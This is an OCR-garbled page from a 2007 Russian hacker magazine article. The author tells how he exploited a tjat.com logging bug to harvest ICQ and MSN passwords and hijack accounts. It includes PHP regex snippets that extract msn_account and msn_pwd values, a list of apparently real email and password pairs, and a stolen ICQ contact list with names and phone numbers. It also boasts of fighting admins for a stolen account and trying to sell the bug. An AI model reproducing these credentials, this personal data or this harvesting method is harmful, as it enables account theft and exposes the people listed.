Ãœðù - Xakep Online
Ãœðù - Xakep Online
Ãœðù - Xakep Online
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
взлом<br />
Номерки Содержимое /etc/passwd<br />
мыл, чтобы потом их пробить по базе primary-mail<br />
6dig уинов? Принявшись за дело, сначала я изменил<br />
первую функцию так, чтобы скрипт показывал<br />
мне логи не аськи, а msn-аккаунтов:<br />
preg_match_all('/<br />
msn_account=(.*)&msn_<br />
pwd=(.*)(&|HTTP)/<br />
i',$buffer,$matches3);<br />
$matches[0]=array_<br />
unique($matches[0]);<br />
!empty($matches[0][0]) ? print<br />
$matches[0][0]."\n" : '';<br />
А в парсере я подправил следующее:<br />
$s=preg_replace("/msn_<br />
account=(.*)&msn_pwd=(.*)(<br />
|HTTP)/i","$1;$2",$s);<br />
В итоге получился красивый списочек мыл,<br />
из которых на тысячу 5-8 стабильно были<br />
primary к какому-нибудь шестизнаку. Привожу<br />
тут небольшой списочек (теперь пускай меня<br />
прощают владельцы этих мыл :)).<br />
Jadallaf@hotmail.Com;farouk1975<br />
cutemalik9@hotmail.com;456321<br />
Devil.Matrix@hotmail.Com;<br />
2081988<br />
Crno_slatko_pile@hotmail.com;<br />
901901<br />
M3assal_teffehten@hotmail.сom;<br />
charbel<br />
Про то, как я писал скрипты, которые сравнивают<br />
базы примаков и мои логи, рассказывать не<br />
буду, так как это отдельная и очень печальная<br />
история :).<br />
Эпилог<br />
Отыскав эту багу, я получил очень и очень<br />
много элитных уинов: шох, зеркал, xy и т.д. На<br />
одном из них (xxyxxx) сижу до сих пор :). А чтобы<br />
ты, дорогой читатель, возрадовался, открою<br />
тебе небольшой секрет. Сервис tjat.com очень<br />
любят асечные админы, я уводил такие их<br />
номерки, как:<br />
xàêåð 05 /101/ 07<br />
/<br />
23673<br />
59000<br />
55444<br />
35555<br />
С 23673 даже произошла очень веселая<br />
история: другие номерки админы забирали<br />
максимум через день, а этот я привязал к Рамблер-ICQ<br />
и при любой попытке админа забрать<br />
его обратно возвращал его себе :). Это продолжалось<br />
около месяца, пока админ не додумался<br />
убить в базе аськи значение с привязкой этого<br />
номера.<br />
На сладкое приведу здесь кусочек контактлиста<br />
35555:<br />
ICQ;10008;Orey Gil-yam;;+972<br />
(52) 4872322 SMS;Fri Sep 23 2005<br />
11:08:38<br />
ICQ;10009;Tomer;;;Sun Sep 25<br />
2005 13:00:09<br />
ICQ;11221;Liat -Mrkt;;;Thu Mar<br />
30 2006 13:28:59<br />
General;65656;Eitan Shay;;+972<br />
(55) 766582.;Fri Feb 10 2006<br />
08:54:58<br />
General;7050324;Clarisse;;;Fri<br />
Feb 10 2006 08:53:53<br />
General;77770;Benny;;;Fri Feb 10<br />
2006 08:53:54<br />
Friends;56666;Dan<br />
Rogachevsky;;+972 (50)<br />
3089999;Fri Feb 10 2006 08:54:58<br />
Cellcom;55155;Ran —<br />
Cellcom;;;Fri Feb 10 2006<br />
08:54:58<br />
Bell Mobility;1028176;Eric<br />
Corbeil;;;Thu Dec 23 2004<br />
13:31:59<br />
Bell Mobility;62381992;Mellie<br />
Chow;;;Fri Feb 10 2006 08:54:59<br />
BigMir Ukrine;141222364;...<br />
Yaroslav...;;;Mon Jul 24 2006<br />
13:04:57<br />
AOL Ops;20702012;Patrick;;;Thu<br />
Dec 23 2004 13:30:55<br />
AOL Ops;54662;ICQ NOC;;;Fri Feb<br />
10 2006 08:54:58<br />
AOL Ops;71173;kate;;;Fri Feb 10<br />
2006 08:53:53<br />
Небольшое примечание: 10008 — самый<br />
главный человек в аське, так что звони ему и<br />
пиши sms :).<br />
З.Ы.<br />
После благополучного использования баги<br />
в течение пяти месяцев во мне взыграла<br />
жадность, и я решил продать ее. Поместил<br />
объявление на асечке, прошел гаранта, и<br />
тут знающие люди начали копать… В итоге<br />
все узнали про бажный сервис и некоторые<br />
чуть не докопались до сути. Поняв, что с меня<br />
хватит такого геморроя, я написал эту статью<br />
и сообщил о баге администраторам сервиса,<br />
которые ее благополучно и прикрыли. Кстати,<br />
после публикации на асечке реакция админов<br />
последовала незамедлительно — у себя на<br />
форуме они написали, что tjat.com не ведет<br />
никаких логов, им очень жаль людей, которые<br />
потеряли номерки, но админы и их сервис ни в<br />
чем не виноваты:<br />
Tjat system NOT storing any<br />
UIN passwords (The validation<br />
process is not with Tjat at all<br />
(Icq.com), so we dont need that<br />
information), the passwords<br />
stored on your mobile device<br />
himself, as a part of the<br />
RememberMe feature.<br />
Please consider that when using<br />
any RememberMe feature on<br />
cellular phones at all DONT give<br />
your mobile to others, or remove<br />
these links/cookies first, they<br />
can use it for abuse!!!<br />
Охотно им поверим и закончим на этом :).<br />
Пользуясь случаем, передаю спасибо за<br />
моральную поддержку Cash, [De1eT], F100D<br />
P0w3R, DarkFull, Zahareg, всем, кто принимал<br />
участие в развитии этой истории на асечке и<br />
злом, а также админам tjat.com за то, что они<br />
все же прочитали мой мейл и приняли меры по<br />
устранению уязвимости :).z<br />
089